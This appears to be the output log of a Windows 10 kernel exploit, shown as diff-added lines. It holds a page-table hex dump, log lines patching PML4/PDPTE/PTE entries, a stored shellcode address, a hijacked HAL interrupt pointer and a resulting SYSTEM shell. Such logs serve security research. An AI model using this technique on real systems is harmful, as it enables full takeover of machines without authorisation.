+000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
+000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............
+000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....
+000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
+000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............
+000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......
+000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@..............
+000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
+000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......
+000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......
+
++] Selected spurious PML4E: fffff67b3d9ecf00
++] Spurious PT: fffff67b3d9e0000
++] Content pml4e fffff67b3d9ecff8: 99f063
++] Patching the Spurious Offset with 99f067
++] Content pdpte fffff67b3d9ffff8: 9a0063
++] Patching the Spurious Offset with 9a0067
++] Content pdpte fffff67b3ffffff0: 821063
++] Patching the Spurious Offset with 821067
++] Content pte fffff67fffffe800: 1967
++] Patching the Spurious Offset with 1967
+Original HalpIntteruptRequest pointer: fffff80150e1fc40
++] Selected spurious PML4E: fffff67b3d9ecf08
++] Spurious PT: fffff67b3d9e1000
++] Content pml4e fffff67b3d9ecff8: 99f063
++] Patching the Spurious Offset with 99f067
++] Content pdpte fffff67b3d9ffff8: 9a0063
++] Patching the Spurious Offset with 9a0067
++] Content pdpte fffff67b3ffffff0: 821063
++] Patching the Spurious Offset with 821067
++] Content pte fffff67fffffe800: 1967
+*** Patching the original location to enable NX...
++] Patching the Spurious Offset with 1967
+HAL address: fffff67b3d9e1000
++] w00t: Shellcode stored at: ffffffffffd00d50
++] Selected spurious PML4E: fffff67b3d9ecf10
++] Spurious PT: fffff67b3d9e2000
++] Content pml4e fffff67b3d9ecff8: 99f063
++] Patching the Spurious Offset with 99f067
++] Content pdpte fffff67b3d9ffff8: 9a0063
++] Patching the Spurious Offset with 9a0067
++] Content pdpte fffff67b3ffffff0: 821063
++] Patching the Spurious Offset with 821067
++] Content pte fffff67fffffe800: 1967
++] Patching the Spurious Offset with 1967
+Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50
+Microsoft Windows [Version 10.0.14393]
+(c) 2016 Microsoft Corporation. All rights reserved.
+
+C:\Users\qa\Desktop>
+C:\Users\qa\Desktop>whoami
+nt authority\system
+
+C:\Users\qa\Desktop>